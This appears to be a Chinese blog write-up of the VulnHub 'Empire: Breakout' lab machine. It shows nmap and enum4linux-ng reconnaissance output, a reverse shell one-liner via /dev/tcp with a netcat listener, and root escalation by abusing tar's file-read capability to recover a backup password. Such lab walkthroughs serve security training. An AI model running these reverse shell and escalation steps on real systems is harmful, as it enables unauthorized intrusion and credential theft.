Empire: Breakout

最新推荐文章于 2025-02-09 17:59:03 发布
原创 最新推荐文章于 2025-02-09 17:59:03 发布 · 718 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #网络安全 #web安全

本文详细记录了一次针对192.168.0.109的Nmap扫描,揭示了目标主机的操作系统指纹、服务探测结果和安全配置,展示了使用sudonmap和 ENUM4Linux进行的深入探测过程。 
$ sudo nmap -sP 192.168.0.1/24

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:54 CST
Nmap scan report for 192.168.0.1
Host is up (0.00054s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.103
Host is up (0.22s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for earth.local (192.168.0.108)
Host is up (0.00042s latency).
MAC Address: 08:00:27:BE:06:F9 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.109
Host is up (0.00091s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.88 seconds

 sudo nmap -sV -sC -A 192.168.0.109

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:56 CST
Nmap scan report for 192.168.0.109
Host is up (0.0018s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/2%OT=135%CT=1%CU=35170%PV=Y%DS=1%DC=D%G=Y%M=E86A64%T
OS:M=62480FDB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=I%CI=I%II=I
OS:%SS=S%TS=U)OPS(O1=M5B4NNS%O2=M5B4NNS%O3=M5B4%O4=M5B4NNS%O5=M5B4NNS%O6=M5
OS:B4NNS)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T
OS:=80%W=2000%O=M5B4NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-04-02T08:57:34
|_  start_date: N/A
|_clock-skew: 39s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: PLUTO, NetBIOS user: <unknown>, NetBIOS MAC: e8:6a:64:83:2c:c0 (Lcfc(hefei) Electronics Technology)

TRACEROUTE
HOP RTT     ADDRESS
1   1.79 ms 192.168.0.109

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.73 seconds

<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.


-->

.2uqPEfj3D<P'a-3

/enum4linux-ng.py 192.168.0.107 -A -C  -R -I -k

ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 192.168.0.107
[*] Username ......... ''
[*] Random Username .. 'qpmlpjob'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
[*] RID Range(s) ..... 500-550,1000-1050
[*] Known Usernames .. 'administrator,guest,krbtgt,domain admins,root,bin,none'

 =====================================
|    Service Scan on 192.168.0.107    |
 =====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    NetBIOS Names and Workgroup for 192.168.0.107    |
 =====================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Full NetBIOS names information:
- BREAKOUT        <00> -         B <ACTIVE>  Workstation Service
- BREAKOUT        <03> -         B <ACTIVE>  Messenger Service
- BREAKOUT        <20> -         B <ACTIVE>  File Server Service
- ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
- WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
- WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
- MAC Address = 00-00-00-00-00-00

 ==========================================
|    SMB Dialect Check on 192.168.0.107    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB1 only: false
Preferred dialect: SMB 3.0
SMB signing required: false

 ==========================================
|    RPC Session Check on 192.168.0.107    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[+] Server allows session using username 'qpmlpjob', password ''
[H] Rerunning enumeration with user 'qpmlpjob' might give more results

 ====================================================
|    Domain Information via RPC for 192.168.0.107    |
 ====================================================
[+] Domain: WORKGROUP
[+] SID: NULL SID
[+] Host is part of a workgroup (not a domain)

 ============================================================
|    Domain Information via SMB session for 192.168.0.107    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: BREAKOUT
NetBIOS domain name: ''
DNS domain: ''
FQDN: breakout

 ================================================
|    OS Information via RPC for 192.168.0.107    |
 ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 4.13.5-Debian)
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian

 ======================================
|    Users via RPC on 192.168.0.107    |
 ======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 0 users via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 0 users via 'enumdomusers'

 =======================================
|    Groups via RPC on 192.168.0.107    |
 =======================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 =========================================
|    Services via RPC on 192.168.0.107    |
 =========================================
[+] Found 4 service(s):
NETLOGON:
  description: Net Logon
RemoteRegistry:
  description: Remote Registry Service
Spooler:
  description: Print Spooler
WINS:
  description: Windows Internet Name Service (WINS)

 =======================================
|    Shares via RPC on 192.168.0.107    |
 =======================================
[*] Enumerating shares
[+] Found 2 share(s):
IPC$:
  comment: IPC Service (Samba 4.13.5-Debian)
  type: IPC
print$:
  comment: Printer Drivers
  type: Disk
[*] Testing share IPC$
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A

 ==========================================
|    Policies via RPC for 192.168.0.107    |
 ==========================================
[*] Trying port 445/tcp
[+] Found policy:
domain_password_information:
  pw_history_length: None
  min_pw_length: 5
  min_pw_age: none
  max_pw_age: 49710 days 6 hours 21 minutes
  pw_properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
domain_lockout_information:
  lockout_observation_window: 30 minutes
  lockout_duration: 30 minutes
  lockout_threshold: None
domain_logoff_information:
  force_logoff_time: 49710 days 6 hours 21 minutes

 ==========================================
|    Printers via RPC for 192.168.0.107    |
 ==========================================
[+] No printers returned (this is not an error)

 ===================================================================
|    Users, Groups and Machines on 192.168.0.107 via RID Cycling    |
 ===================================================================
[*] Trying to enumerate SIDs
[+] Found 3 SID(s)
[*] Trying SID S-1-22-1
[+] Found user 'Unix User\cyber' (RID 1000)
[*] Trying SID S-1-5-21-1683874020-4104641535-3793993001
[+] Found user 'BREAKOUT\nobody' (RID 501)
[+] Found domain group 'BREAKOUT\None' (RID 513)
[*] Trying SID S-1-5-32
[+] Found builtin group 'BUILTIN\Administrators' (RID 544)
[+] Found builtin group 'BUILTIN\Users' (RID 545)
[+] Found builtin group 'BUILTIN\Guests' (RID 546)
[+] Found builtin group 'BUILTIN\Power Users' (RID 547)
[+] Found builtin group 'BUILTIN\Account Operators' (RID 548)
[+] Found builtin group 'BUILTIN\Server Operators' (RID 549)
[+] Found builtin group 'BUILTIN\Print Operators' (RID 550)
[+] Found 2 user(s), 8 group(s), 0 machine(s) in total

Completed after 8.18 seconds

nc -lvnp 2022

sh -i >& /dev/tcp/192.168.0.104/2022 0>&1

listening on [any] 2022 ...
connect to [192.168.0.104] from (UNKNOWN) [192.168.0.107] 40390
sh: 0: can't access tty; job control turned off
$ id 
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
cyber@breakout:~$ 

cyber@breakout:~$ cat us	

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

cyber@breakout:~$ file tar

tar: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=727740cc46ed2e44f47dfff7bad5dc3fdb1249cb, for GNU/Linux 3.2.0, stripped

cyber@breakout:~$ getcap t    

getcap tar 
tar cap_dac_read_search=ep

cyber@breakout:~$ ./tar -cvf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak

cyber@breakout:~$ ls

bak.tar  pass.tar  tar  user.txt

cyber@breakout:~$  tar -xvf pass.tar

var/backups/.old_pass.bak

cyber@breakout:~$ cat var/backups/.old_pass.bak

Ts&4&YurgtRX(=~h

cyber@breakout:~$ su root

Password: Ts&4&YurgtRX(=~h

root@breakout:/home/cyber# cd ~

root@breakout:~# ls -al
ls -al
total 40
drwx------  6 root root 4096 Oct 20 07:53 .
drwxr-xr-x 18 root root 4096 Oct 19 13:51 ..
-rw-------  1 root root  281 Oct 20 07:53 .bash_history
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 Oct 19 08:49 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root  100 Oct 19 15:15 rOOt.txt
drwx------  2 root root 4096 Oct 19 13:58 .spamassassin
drwxr-xr-x  2 root root 4096 Oct 19 13:58 .tmp
drwx------  6 root root 4096 Oct 19 13:58 .usermin

root@breakout:~# cat r00t.txt

cat: r00t.txt: No such file or directory
root@breakout:~# cat rOOt.txt

3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity

root@breakout:~#
[Vulnhub]Empire: Breakout
qq_48749937的博客
03-04 4522
kali ip:192.168.56.105 靶机 ip:192.168.56.110 首先还是常规的扫描靶机开放端口情况 这个靶机跟平常只有ssh和http的靶机不同,没有ssh,猜测可能需要获取webshell 首先访问每一个http服务,80端口: 10000端口: 20000端口: 发现存在两个登录页面,但在审计80端口的首页源码时,发现一串密码,是ook加密: 拿到网站去解密,获得一串密码 成功获取密码,但是目前没有账号,想了好久找不到账号该这么找..
vulnhub靶场之EMPIRE:BREAKOUT
qq_58091216的博客
01-29 1323
在Linux中,能力是一种粒度更细的权限系统,用于授予进程执行特定操作的权限,而不是传统的用户和组权限模型。我们已经有了用户的密码,所以我们要着手寻找用户名了,由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举: Enum4linux 可以列出目标系统上的用户和组,包括一些敏感信息,如用户ID(UID)、组ID(GID)、用户描述等。10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。
靶机1 Empire:Breakout(帝国突围)
honest_gg的博客
09-09 1461
本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
Vulnhub 靶场 EMPIRE: BREAKOUT
weixin_61951055的博客
11-20 883
Vulnhub 靶场 EMPIRE: BREAKOUT
【VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 4068
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
Vulnhub靶机——EMPIRE: BREAKOUT
流水不争先,争的是滔滔不绝
04-08 1210
Vulnhub靶机——EMPIRE: BREAKOUT,tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限,利用tar文件的打包压缩再解压,实现文件的权限绕过
vulnhub靶机:Empire: Breakout
weixin_69670995的博客
05-13 987
发现它是可以读取任意的文件,但是不知道/root目录下有什么文件,到着没有思路了,查看网上资料在/var/ backups目录下面有一个.old_pass.bak文件,我们使用tar去查看一下这文件里的内容(先将.old_pass.bak文件进行压缩到家目录下,然后解压到家目录下,使用cat命令查看文件)试了很多次,发现不让输入密码,这就很无语,报"Authentication failure"错误,我知道的报这个错误的原因是密码输入错误或者是root没有设置密码,尝试一下反弹shell吧。
[渗透测试学习靶机02] vulnhub靶场 Empire: Breakout
weixin_47112073的博客
10-13 1227
渗透测试学习,vulnhub靶场练习,简单靶机Empire: Breakout
EMPIRE:BREAKOUT渗透测试
最新发布
weixin_69783474的博客
02-09 742
7、在刚才的解码中我们找到了一个密码,又在刚才找到了一个用户名,而10000和20000又都是登陆界面,所以我们可以尝试登录一下。80端口是一个apache页面,我们看一下有没有什么信息,发现并没有什么信息,可以再看一下网页的源代码。Cd 进去又说没有这样的文件,而tar本身有很多权限,所以说明可读有其他文件,通过其他文件可以看tar。可以知道它具有读取⽂件的⼀个功能。有一个这样的文件,发现没有可执行的权限,但是刚才的tar有可执行的权限。(其中的ip地址是kali的ip地址,6666是刚才设置的端口)
vulnhub-EMPIRE: BREAKOUT
qq_43006864的博客
05-01 915
Empire: Breakout ~ VulnHub 靶机:EMPIRE: BREAKOUT 攻击机: kali linux Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集 nmap 192.168.1.1/24 nmap -sS -sV -A -p- 192.168.1.107 访问一下80端口 在页面源码的最底部发...
靶机渗透练习42-Empire Breakout
hirak0的博客
04-19 2564
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-breakout,751/ Description Difficulty: Easy This box was created to be an Easy box, but it can be Medium if you get lost. For hints discord Server ( https://discord.gg/7asvAhCEhe ) 一、搭建靶机环境 攻击机Kali: IP地址:192
vulnhub:Empire: Breakout
Ra1n3的博客
11-29 3406
vulnhub打靶记录
【Vulnhub靶场】EMPIRE: BREAKOUT
DG_s1mple
01-24 4794
环境准备 下载靶机,导入到vmware里面,这应该不用教了吧 开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了 攻击机IP地址为:192.168.2.15 靶机IP地址为:192.168.2.18 信息收集 使用nmap扫描靶机开放的端口信息 发现靶机开放了三个网页端口和SMB服务 我们去网站访问一下 80端口是正常的网页 但当我去查看源码的时候,发现了ook加密的过后的字符串 翻译过来时:别担心没有人会来这里,和你分享我的权限是安全的。它是加密的:) 解密过后是:.2uqPEfj
Empire Breakout (vulnhub靶机之帝国系列靶机1)
m0_53193784的博客
08-13 502
vulnhub靶场报告,本次文章对vulnhub靶场的帝国系列第一台靶机进行渗透并输出渗透测试报告,后续作者会更新跟多的靶场给各位提供思路.希望可以帮到大家. 一起进步. fucking go
靶机Empire:Breakout(帝国突围)
m0_67427205的博客
12-18 297
扫描同一网段的ip地址,因为靶机的ip地址我们不知道本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权使用 enum4linux 枚举信息Brainfuck解密webadmin 后台反弹 shell 提权提权微信搜索公众号关注“东南网络安全
Vulnhub项目:EMPIRE: BREAKOUT
Ays.Ie的博客
12-07 394
Vulnhub项目:EMPIRE: BREAKOUT
攻防靶场(21):EMPIRE BREAKOUT
OneMoreThink
10-25 616
目录1. 侦查 Reconnaissance1.1 IP地址1.2 端口和服务3. 初始访问 Initial Access3.1 普通用户帐号3.2 普通用户密码3.3 web权限3.4 server权限6. 权限提升 Privilege Escalation6.1 特权用户密码6.2 root权限(方式1)6.3 root权...
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
qq_51577576的博客
03-05 1760
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值